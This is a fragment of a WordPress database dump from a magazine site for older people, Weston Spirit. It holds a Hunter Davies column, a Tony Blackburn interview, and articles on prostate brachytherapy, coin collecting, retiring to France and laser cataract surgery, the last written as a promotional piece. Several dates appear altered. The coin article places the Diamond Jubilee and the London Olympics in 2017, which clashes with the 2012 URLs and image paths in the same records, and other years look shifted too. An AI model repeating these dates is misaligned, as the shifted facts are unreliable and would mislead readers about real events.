up, but it looks right – which means there are 10m people roughly like me, another fabricated figure but who’s counting?</p>&#13;\n<p>The point is that there are far more of us oldies than ever before. We are all living longer, and we will continue to live longer.</p>&#13;\n<p>And we have all the money. Oh yes. Young people, har har, don’t have nuffink, not got two houses to rub together, hardly ever take swish Caribbean holidays or run a Jaguar or manage two luxury cruises a year or spend small fortunes on their potty football collections like some people I know.</p>&#13;\n<p>They don’t even have jobs, so many of our young people, far less any savings. Serves ‘em right, I have to stop myself saying, for being young and attractive with unwrinkled skin and no liver spots.</p>&#13;\n<p>We are so lucky, we modern oldies, luckier than any other oldies who ever lived, with so much to look forward to. I got 10 years out of Father’s Day. If I can’t get 10 years out of writing about being a granddad, I’ll be spitting.</p>&#13;\n									</div>','Hunter Davies','1043','publish','open','open','','hunter-davies','','','2018-04-02 20:08:28','2018-04-02 20:08:28','',0,'http://westonspirit.org.uk/hunter-davies.asp',0,'post','',0),(101,1,'2015-10-08 04:41:11','2015-10-08 04:41:11','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"I couldn’t live without… My gadgets\" st_url=\"http://westonspirit.org.uk/2012/01/i-couldnt-live-without-my-gadgets/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"I couldn’t live without… My gadgets\" st_url=\"http://westonspirit.org.uk/2012/01/i-couldnt-live-without-my-gadgets/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"I couldn’t live without… My gadgets\" st_url=\"http://westonspirit.org.uk/2012/01/i-couldnt-live-without-my-gadgets/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"I couldn’t live without… My gadgets\" st_url=\"http://westonspirit.org.uk/2012/01/i-couldnt-live-without-my-gadgets/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"I couldn’t live without… My gadgets\" st_url=\"http://westonspirit.org.uk/2012/01/i-couldnt-live-without-my-gadgets/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>DJ Tony Blackburn, the first voice on Radio 1</h4>&#13;\n<h3>We thought you’d choose an old Temptations record, but you’re waxing lyrical about the iPhone.</h3>&#13;\n<p><img class=\"alignright size-full wp-image-1491\" title=\"BBC Radio 2 Presenters 2011\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/578643-high_res-bbc-radio-2-presenters-2011.jpg\" alt=\"\" width=\"358\" height=\"572\" />Keeping up to date has kept me going. Years ago, I had one of the first satellite dishes in the country; it was 1.9 metres across and it revolved in the garden. My neighbours reported me to the authorities as a spy. Now some DJs want a return to the days of vinyl! I like the hard drive and downloading – I haven’t been in a record shop for years. The iPhone allows me to listen to my favourite New York radio station when I’m in the car. I really wish I hadn’t just turned 69 because I want to know what’s going to happen in 30 years’ time.</p>&#13;\n<h3>Do you ever reflect fondly on your pre-technology days?</h3>&#13;\n<p>Back in the 1960s before satnav, I was forever travelling around doing discos at night, getting lost in the middle of nowhere because I was reading a map. You must never close your mind to anything. My dad got one of the first domestic radios and rang his father to say that he was listening to signals through the air. My grandfather apparently said: “Don’t be so stupid”, and hung up.</p>&#13;\n<h3>Do you still feel excited about new music?</h3>&#13;\n<p>Of course. A lot of people say “Oh, they don’t write songs like they used to.” Too right. A lot of them are so much better. There was great music around in the 1960s but there was also an enormous amount of rubbish you don’t hear anymore.</p>&#13;\n<h3>What invention are you waiting for next?</h3>&#13;\n<p>The self-drive electric car. I’d also like to fly into Radio 2 with a jetpack, particularly with the Olympics on the horizon. I’m dreading that – the traffic will be horrible.</p>&#13;\n<h3>Please reassure us that your jokes are safely stored and backed-up somewhere for the nation.</h3>&#13;\n<p>When I was on the pirate ships, I used to write them down in exercise books. I still have them, but I can’t tell you where they are for security reasons. Actually, I don’t tell many gags on air anymore. I’ve changed the humour a bit but no-one seems to notice. </p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Tony Blackburn</strong> presents BBC Radio 2’s Pick of the Pops (Saturdays, 1-3pm).</em></p>&#13;\n									</div>','I couldn’t live without… My gadgets','380','publish','open','open','','i-couldnt-live-without-my-gadgets','','','2018-04-02 20:08:27','2018-04-02 20:08:27','',0,'http://westonspirit.org.uk/i-couldnt-live-without-my-gadgets.asp',0,'post','',0),(102,1,'2014-04-26 19:19:54','2014-04-26 19:19:54','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Let’s talk about cancer\" st_url=\"http://westonspirit.org.uk/2012/01/lets-talk-about-cancer/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Let’s talk about cancer\" st_url=\"http://westonspirit.org.uk/2012/01/lets-talk-about-cancer/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Let’s talk about cancer\" st_url=\"http://westonspirit.org.uk/2012/01/lets-talk-about-cancer/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Let’s talk about cancer\" st_url=\"http://westonspirit.org.uk/2012/01/lets-talk-about-cancer/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Let’s talk about cancer\" st_url=\"http://westonspirit.org.uk/2012/01/lets-talk-about-cancer/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Men are reluctant to open up about their health, but with early diagnosis and targeted brachytherapy treatment, prostate cancer doesn’t have to mean the end of the world, says Deborah Wain</h4>&#13;\n<p>It was, says William Gillies, like “being hit by a sledgehammer”.</p>&#13;\n<p>The property landlord was fit and well, had no symptoms when he was diagnosed with prostate cancer, following a routine cholesterol check. Like many men, he preferred not to think or talk too much about “that side” of his health, he admits.</p>&#13;\n<p>Gillies, then 62, faced three treatment options: surgery to remove his prostate gland, having his cancer closely monitored, or a highly-targeted internal radiotherapy called brachytherapy.</p>&#13;\n<p>Having the cancer cut away felt like the best option initially, but he was warned that surgery could leave him with impotence problems and urinary incontinence. So, after careful thought, he became one of a growing number of people who opt for brachytherapy. Five years on, having been given the all-clear by St Luke’s Cancer Centre, Guildford, he has no regrets.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1540\" title=\"dv256027\" src=\"/wp-content/uploads/2012/01/dv256027.jpg\" alt=\"\" width=\"596\" height=\"384\" />“My thinking was that if the brachytherapy didn’t work I still had other options – but it does work,” he says. “I can’t speak highly enough of the treatment and want men to know about it.”</p>&#13;\n<p>Every year in the UK, 37,000 men are diagnosed with cancer of the walnut-like prostate gland that sits beneath the bladder and surrounds the urethra, or tube that urine and semen pass through.</p>&#13;\n<p>Often slow-growing, prostate cancer may never cause harm in a patient’s lifetime and side-effects of treatment can sometimes be worse than problems caused by the disease. However, it is not always possible to tell how quickly the cancer could grow.</p>&#13;\n<p>Brachytherapy suits patients whose cancer is expected to be confined to the prostate gland. Unlike external beam radiotherapy (EBT) – usually given five days a week for around two months – brachytherapy is a single procedure. It offers the same chance of a cure as EBT or a radical prostatectomy yet with far fewer side effects.</p>&#13;\n<p>Brachytherapy involves permanently implanting up to 120 tiny radioactive capsules into the prostate gland using fine needles, guided by ultrasound and 3D computer images. The seeds give off low levels of radiation for up to a year which kills the cancer cells. Most patients are home in a day or two and recovery is generally fast. The procedure is now available on the NHS at 22 cancer centres.</p>&#13;\n<p>Graham Robson, 58, from Aberdeen, was also given the all-clear after brachytherapy. Robson, head of a recruitment business, was planning to opt for surgery until he found out about the newer treatment, and he now represents patients with the Prostate Brachytherapy Advisory Group.</p>&#13;\n<p>Robson wants to see men take control of decisions after diagnosis, when, he says: “You’re thinking you might die, so quality of life simply means living. It’s human nature to make the best of what you have, but you want to be making good decisions.”</p>&#13;\n<p>Consultant urologist Professor Stephen Langley co-founded the renowned Prostate Brachytherapy Centre at St Luke’s, where 2,000 patients have undergone the procedure since 1999. Of the first 700 patients, 92 per cent have been given the allclear. A total of 83 per cent of men who were potent before receiving treatment are able to have an erection afterwards and less than 1 per cent report incontinence problems.</p>&#13;\n<p>Professor Langley stresses that difficulties with sex or incontinence can have an “emotional impact more devastating than one might expect” on a man.</p>&#13;\n<p>Prostate cancer is only curable if it has not spread beyond the prostate gland, but is almost always symptomless at that stage. A PSA blood test can indicate if there might be a problem. Men aged over 50 are urged to discuss being tested with their GP.</p>&#13;\n									</div>','Let’s talk about cancer','615','publish','open','open','','lets-talk-about-cancer','','','2018-04-02 20:08:25','2018-04-02 20:08:25','',0,'http://westonspirit.org.uk/lets-talk-about-cancer.asp',0,'post','',0),(103,1,'2016-10-10 05:14:16','2016-10-10 05:14:16','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/01/letter-from-the-editor/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/01/letter-from-the-editor/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/01/letter-from-the-editor/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/01/letter-from-the-editor/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/01/letter-from-the-editor/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Welcome to your new-look Weston Spirit</h4>&#13;\n<p>We’ve had a redesign, creating space for more interviews, news and events, plus an expanded finance section.</p>&#13;\n<p>And we have a new columnist, the writer and broadcaster Hunter Davies, who will be holding forth on what it’s like to be a grandfather and all round older person in youth-obsessed Britain.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1487\" title=\"cartoon_Jan\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/cartoon_Jan-e1327684792411.jpg\" alt=\"\" width=\"353\" height=\"342\" />Hunter has worked in Fleet Street for five decades and has no desire to abandon the keyboard to put his feet up – one of his many projects is editing a book of John Lennon’s letters for publication later this year.</p>&#13;\n<p>Our star interviewee, Robert Vaughn, is similarly occupied with a work schedule of not one but two British TV series and a film on the go. Both in their 70s, slowing down doesn’t occur to either, though both could doubtless afford to.</p>&#13;\n<p>The notion of more people working past retirement age has been much in the news again lately – see our news round- up for the latest ridiculous acronym it has spawned – but many people, while not wanting to go ‘on and on and on’, recognise that meaningful work helps to give shape to their lives, even if the work is unpaid. Where would schools, museums, hospitals and charities be without the army of volunteers over 60?</p>&#13;\n<p>Even if the job isn’t glamorous or highly remunerated, people will often choose to carry on working. It’s having the choice that’s the important bit.</p>&#13;\n									</div>','Letter from the editor','242','publish','open','open','','letter-from-the-editor','','','2018-04-02 20:08:24','2018-04-02 20:08:24','',0,'http://westonspirit.org.uk/letter-from-the-editor.asp',0,'post','',0),(104,1,'2015-12-26 21:33:39','2015-12-26 21:33:39','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Priceless history\" st_url=\"http://westonspirit.org.uk/2012/01/priceless-history/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Priceless history\" st_url=\"http://westonspirit.org.uk/2012/01/priceless-history/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Priceless history\" st_url=\"http://westonspirit.org.uk/2012/01/priceless-history/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Priceless history\" st_url=\"http://westonspirit.org.uk/2012/01/priceless-history/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Priceless history\" st_url=\"http://westonspirit.org.uk/2012/01/priceless-history/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>The landmark events of 2017 are an ideal opportunity to begin your journey into the rewarding world of coin collecting</h4>&#13;\n<p>All eyes are on us in 2017 for what is guaranteed to be a landmark year for British history, celebrated across the world.</p>&#13;\n<p>The Queen’s Diamond Jubilee and the London 2017 Olympic and Paralympic Games offer a rare opportunity to celebrate a significant year with commemorative coins, and perhaps to start a collection.</p>&#13;\n<p></p><div id=\"attachment_1521\" class=\"wp-caption alignleft\" style=\"width: 261px\"><img class=\"size-full wp-image-1521 \" title=\"QDJ_Silve copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/QDJ_Silve-copy.jpg\" alt=\"\" width=\"251\" height=\"310\" /><p class=\"wp-caption-text\">The commemorative silver proof Diamond Jubilee crown</p></div>&#13;\n<p>As a nation of collectors, Britons’ take great pride in acquiring and storing away memorabilia. However, mugs break, t-shirts tire, and posters fade. In a year of such historical significance, a coin is one souvenir that is set to survive the decades.</p>&#13;\n<p>“People often commemorate the year of their wedding or the birth of a baby by buying sets of coins,” says Dr Kevin Clancy, director of The Royal Mint Museum. How many of us have a 1977 silver Jubilee crown, or a Churchill crown tucked away in a drawer, bringing back not only memories of the event but also the doting aunt or loving grandfather who gave it to us?</p>&#13;\n<p>This summer the nation will rejoice as the Queen becomes only the second monarch in British history to celebrate a Diamond Jubilee. To mark the occasion, The Royal Mint has issued a new 2017 UK coin – the first ever struck to commemorate a Diamond Jubilee. The Queen’s official £5 Diamond Jubilee Coin features a new portrait specially created for 2017.</p>&#13;\n<p>Coins tell many stories about social and cultural history. For example, coins have not always depicted the head of state. “In Medieval Britain the coins simply bore a crude image of a man, rather than a likeness of the monarch,” says Clancy, “It was only from the start of the Tudor dynasty that British coins bore the monarch’s image.”</p>&#13;\n<p>Coins were also the first form of mass communication. “They were produced in larger quantities than any other item, and were usually the only way that subjects knew what their rulers looked like,” he says.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1525\" title=\"134191407 copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/134191407-copy.jpg\" alt=\"\" width=\"596\" height=\"397\" />This historical legacy is part of the appeal of coin collecting, also known as numismatics. A coin can be a direct link between an historical occasion and personal family history. “A coin is on a hand-to-hand journey through history. Collectors often like to speculate about who previously held a coin in their hand,” says Clancy.</p>&#13;\n<p>Today there are millions of coin collectors worldwide, drawn in by the fundamental attraction underlying all collecting: the thrill of the chase. You can start by searching through the coins in your pocket.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1524\" title=\"120747633 copy\" src=\"/wp-content/uploads/2012/01/120747633-copy.jpg\" alt=\"\" width=\"358\" height=\"538\" />The 50p coin that explains football’s offside rule is expected to be especially popular with people who collect circulated coins (and will be a major point of discussion over pub tables).</p>&#13;\n<p>Those who collect the full 50p Sports Collection – created to commemorate the London 2017 Olympic and Paralympic Games – will have to track down all 29 designs. Alternatively, The Royal Mint sells the coins in uncirculated condition for £2.99 each, in a colourful presentation card.</p>&#13;\n<p>At the other end of the scale, 2017 marks the issue of the UK’s first-ever kilo coins. The London 2017 Olympic and Paralympic Games Gold Kilo Coin, designed by sculptor Sir Anthony Caro, is being released in a limited edition of just 60. Minted in .999 fine gold, it costs £100,000.</p>&#13;\n<p>Without doubt, 2017 will be a year to remember for generations to come. Don’t miss out on getting your own piece of history that you can hold in your hand – and that will last forever.</p><div class=\"woo-sc-hr\"></div>&#13;\n<h3>Heads and tales of collecting</h3>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>The beauty is in the detail, says one enthusiast</h3>&#13;\n<p>Coin collector David Andrews [not real name] says: “I love coins because they are miniature works of art that you can easily handle.”</p>&#13;\n<p>David‘s enthusiasm for coin collecting started early. “My parents bought me proof sets of the pre-decimal coins and the then-new coins when I was about seven. My family regarded them as precious, so mostly they were locked away, but occasionally I could persuade my mum to get them out and let me look at them.”</p>&#13;\n<p><img class=\"size-medium wp-image-1522 alignleft\" title=\"The_Queens_Diamond_Jubilee_Coin_Reverse copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/The_Queens_Diamond_Jubilee_Coin_Reverse-copy-300x288.jpg\" alt=\"\" width=\"300\" height=\"288\" />Andrews now collects ancient coins from biblical times, and sets of new proof coins bought direct from The Royal Mint.</p>&#13;\n<p>“It’s a contrast. With the biblical coins I like to think about who has held them and where they have travelled. With the proof sets I love the intricate details of the design and the shining faces.” Andrews likes to collect proof sets of new coins that are issued to go into circulation. “Proof sets allow you to see the beauty and intricacy of design of everyday coins that most of the time is simply overlooked,” he says.</p>&#13;\n<p>As a member of Mint Marque, an invitation-only club for selected Royal Mint coin collectors, he has been invited to events that enable him to explore his interest in coin design.</p>&#13;\n<p>Andrews has also taken up invitations to visit The Royal Mint to see the minting process, and The Royal Mint Museum, which is not open to the general public.</p>&#13;\n<p>Andrews advises others considering starting a coin collection: “This is a good time to do it because there is such a wide range of proof coins available this year. There is likely to be something that suits your interests, from royalty to sport, literature and wildlife,” he says.</p>&#13;\n<p>“The only thing to beware of is overenthusiasm that can lead you to want everything, so be selective and watch your budget.”</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<h3>An expert’s guide to becoming a serious collector</h3>&#13;\n<p>Starting a coin collection is easy. Ideally your collection should have a theme, otherwise it risks getting out of hand.</p>&#13;\n<p>“You can be a magpie and buy whatever attracts you at first, and your specialist interest will develop from that,” says Graham Dyer, past president of the British Numismatic Society and a collector since the age of six or seven.</p>&#13;\n<p></p><div id=\"attachment_1519\" class=\"wp-caption alignright\" style=\"width: 310px\"><img class=\"size-medium wp-image-1519\" title=\"Graham Dyer 1\" src=\"/wp-content/uploads/2012/01/Graham-Dyer-1-300x412.jpg\" alt=\"\" width=\"300\" height=\"412\" /><p class=\"wp-caption-text\">Graham Dyer, past president of the British Numismatic Society</p></div>&#13;\n<p>You could collect the coins from a particular reign, those bearing particular emblems such as ships, or examples of the penny from eras throughout history.</p>&#13;\n<p>Research your subject. Get hold of a good book on coins that suits your theme, such as Coins of England and the United Kingdom available from leading coin and medal dealer, Spink. “Even just flicking through the pictures regularly will teach you a lot,” says Dyer.</p>&#13;\n<p>Visit important coin collections to see examples of coins. The British Museum is the largest collection nationally but there are others such as the Ashmolean Museum in Oxford, the National Museum Wales and the National Museums of Scotland.</p>&#13;\n<p>Visit coin fairs to see – and ideally handle – a wide range of coins to familiarise yourself with their appearance and range of conditions you could find them in.</p>&#13;\n<p>Always buy coins in the best condition you can afford, ideally uncirculated (never issued for public use).</p>&#13;\n<p>“Get to know the grading system and aim to buy only coins that are in VF (very fine) or EF (extremely fine) condition or above, unless they are great rarities and worth buying,” says Dyer.</p>&#13;\n<p>Never clean your coins, as this will wear away the detail that makes them so fascinating.</p>&#13;\n<p>Join a local numismatic society. “Members will be delighted to share their enthusiasm,” says Dyer. Later you can graduate to the British Numismatic Society (<em><a title=\"www.britnumsoc.org\" href=\"http://www.britnumsoc.org/\" target=\"_blank\">www.britnumsoc.org</a></em>) or the Royal Numismatic Society (<em><a title=\"www.numismatics.org.uk\" href=\"http://www.numismatics.org.uk/\" target=\"_blank\">www.numismatics.org.uk</a></em>).</p>&#13;\n</div>&#13;\n									</div>','Priceless history','1219','publish','open','open','','priceless-history','','','2018-04-02 20:08:22','2018-04-02 20:08:22','',0,'http://westonspirit.org.uk/priceless-history.asp',0,'post','',0),(105,1,'2017-01-20 16:37:03','2017-01-20 16:37:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Say goodbye to Blighty\" st_url=\"http://westonspirit.org.uk/2012/01/say-goodbye-to-blighty/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Say goodbye to Blighty\" st_url=\"http://westonspirit.org.uk/2012/01/say-goodbye-to-blighty/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Say goodbye to Blighty\" st_url=\"http://westonspirit.org.uk/2012/01/say-goodbye-to-blighty/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Say goodbye to Blighty\" st_url=\"http://westonspirit.org.uk/2012/01/say-goodbye-to-blighty/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Say goodbye to Blighty\" st_url=\"http://westonspirit.org.uk/2012/01/say-goodbye-to-blighty/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>Today’s retirees are looking for more than a quiet life on the coast. For many, a Gallic lifestyle offers that certain je ne sais quoi…</h4>&#13;\n<p>Retirement used to mean buying a bungalow on the British coast, but many of today’s active older homeowners prefer the thought of a gîte or a finca in the sun.</p>&#13;\n<p>There are no official figures on how many Britons own abroad, but accountant firm Grant Thornton says it could be 1.2m. They are mostly 50 and over – the peak time people to buy abroad, ahead of retirement. The Office for National Statistics says there are 665,000 UK retirees living overseas permanently and receiving their UK state pension.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1499\" title=\"97410571\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/97410571.jpg\" alt=\"\" width=\"358\" height=\"456\" />The favourite location is France followed by Spain, Australia and New Zealand, the US – chiefly Florida – and then Italy, Canada and Portugal.</p>&#13;\n<p>There are plenty of popular French locations. Wealthy retirees head for the Cote d’Azur while Languedoc-Roussillon is within easy reach for visiting families thanks to budget airline services to Carcassonne, Montpellier and Perpignan. Small houses in Normandy and Brittany in northern France are very good value, although often suffer British-style weather.</p>&#13;\n<p>“France has overtaken Spain as Britons’ favourite,” says Rebecca Gill of estate agent Savills. “Prices fell 20 per cent from 2007 to 2009 but they’re on the way back. Even so, they’re often a third cheaper than similar properties in the UK.” FNAIM, the French estate agents’ trade body, reports an average five per cent rise across France in 2016.</p>&#13;\n<p>It’s wise to do your homework if you’re planning to move permanently to France, and over- 50s often take several financial precautions.</p>&#13;\n<p>First, they see if their private or state UK pension can be enhanced by integrating it with an international pension scheme called QROPS, the Qualifying Recognised Overseas Pensions Scheme. Second, many take out private health insurance: the cost will vary according to age and health, but for many 50-yearolds it can be around £1,100 a year.</p>&#13;\n<p>UK retirees often make French wills to avoid dispute or uncertainty over the details of their wills back home and finally, they typically consult financial advisers in the UK about the best way to structure their tax and other liabilities.</p>&#13;\n<p>“It sounds complicated but I did it all in three months,” says retired carpet businessman Simon Wheale. In 2007 he left Solihull to live in Villefranche-de-Conflent near Perpignan – and his preparation extended to choosing his location with great care. “I knew the broad area where I wanted to live, but I put my belongings in storage and spent another three months renting, to find the villages with the best facilities.”</p>&#13;\n<p>Aside from the French lifestyle, Wheale enjoys more than 250 days of sunshine a year. He puts it this way: “That’s quite a lot more than I might have in Margate or Worthing.”</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Buying in France</h3>&#13;\n<p>English-language estate agents such as <a title=\"www.my-french-house.com\" href=\"http://www.my-french-house.com/\" target=\"_blank\">www.my-french-house.com</a>, <a title=\"www.aplaceinbrittany.com\" href=\"http://www.aplaceinbrittany.com/\" target=\"_blank\">www.aplaceinbrittany.com</a> and <a title=\"www.cognacproperty.com\" href=\"http://www.cognacproperty.com/\" target=\"_blank\">www.cognacproperty.com</a> can help you if your French is more rusty than fluent.</p>&#13;\n<p>When you find your ideal home, you sign a contract in front of a legal notaire and then commission a survey – even though the French often don’t bother.</p>&#13;\n<p style=\"text-align: left;\"><img class=\"size-full wp-image-1500 aligncenter\" title=\"136325068\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/136325068-e1327685276287.jpg\" alt=\"\" width=\"576\" height=\"368\" />Once you are happy, you pay 10 per cent deposit, kept by the seller if you stop the purchase without good reason.</p>&#13;\n<p>Expect to pay between nine and 12 per cent of the purchase price in stamp duty, legal fees and taxes. If you buy a brand new home, you pay VAT on it, too. </p></div>&#13;\n									</div>','Say goodbye to Blighty','569','publish','open','open','','say-goodbye-to-blighty','','','2018-04-02 20:08:21','2018-04-02 20:08:21','',0,'http://westonspirit.org.uk/say-goodbye-to-blighty.asp',0,'post','',0),(107,1,'2016-10-21 16:52:33','2016-10-21 16:52:33','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/01/see-it-to-believe-it/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/01/see-it-to-believe-it/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/01/see-it-to-believe-it/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/01/see-it-to-believe-it/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"See it to believe it\" st_url=\"http://westonspirit.org.uk/2012/01/see-it-to-believe-it/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Cataracts affect the quality of life for 60 per cent of over-60s. Now, a pioneering surgery offers a safer, more effective alternative to cataract removal</h4>&#13;\n<p>Jonathan Hatley has struggled with poor eyesight since the onset of cataracts – but a revolutionary approach to eye surgery changed everything.</p>&#13;\n<p></p><div id=\"attachment_1536\" class=\"wp-caption alignright\" style=\"width: 300px\"><img class=\"size-full wp-image-1536   \" title=\"Mr Bobby Qureshi Consultant ophthalmic surgeon\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/NEW-London-Eye.jpg\" alt=\"\" width=\"290\" height=\"361\" /><p class=\"wp-caption-text\">Mr Bobby Qureshi Consultant ophthalmic surgeon</p></div>&#13;\n<p>Mr Hatley is a fit and active 70 year-old. He is a keen skier and golfer, yet was suddenly having to contemplate a life without either because of deteriorating eyesight. Even driving was becoming difficult, and he feared his days behind the wheel were numbered.</p>&#13;\n<p>Jonathan went to see Bobby Qureshi at Harley Street’s London Eye Hospital, the UK’s leading private eye hospital. Qureshi suggested a new cataract removal laser treatment – he is the first surgeon to perform this procedure in the UK. The Femtosecond cataract laser machine, with the help of a sophisticated surgeon-guided computer, uses a laser to dissolve a cataract, using perfect precision, within seconds.</p>&#13;\n<p>This new cataract technology has a much faster healing and recovery time compared with conventional surgery, and is statistically much safer. Cataracts affect more than 60 per cent of people over the age of 60. “This is the greatest breakthrough in cataract surgery in nearly 30 years,” says Qureshi. “For years, many people have accepted cataracts as an unavoidable part of getting older, but that no longer needs to be the case. With this new surgery, we now offer a quick, safe and effective alternative for cataract removal.”</p>&#13;\n<p><img class=\"alignright size-full wp-image-1535\" title=\"femto_front copy\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/01/femto_front-copy.jpg\" alt=\"\" width=\"596\" height=\"332\" />“It was honestly a miracle,” says Hatley. “Although I had become accustomed to living with poor eyesight, I suppose I didn’t realise how much worse my vision had become. The difference took my breath away. The treatment that I received at the London Eye Hospital was top-notch from start to finish,” he said.</p>&#13;\n<p>“Before going to see Mr Qureshi, my vision was so bad that I was considering giving up driving altogether, but now I don’t need to. Instead, I’m already planning a ski trip and expect to play a lot more golf. The whole experience has been completely life-changing.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>Tel: 0207 060 2602</em></p>&#13;\n<p><em>Tel: 0800 612 2021</em></p>&#13;\n<p><em>admin@londoneyehospital.com</em></p>&#13;\n<p><strong><em><a title=\"www.londoneyehospital.com\" href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></em></strong></p>&#13;\n									</div>','See it to believe it','354','publish','open','open','','see-it-to-believe-it','','','2018-04-02 20:08:19','2018-04-02 20:08:19','',0,'http://westonspirit.org.uk/see-it-to-believe-it.asp',0,'post','',0),(108,1,'2014-08-08 20:23:59','2014-08-08 20:23:59','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">29 January 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/01/the-near-perfect-asset/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/01/the-near-perfect-asset/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/01/the-near-perfect-asset/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The near perfect asset\" 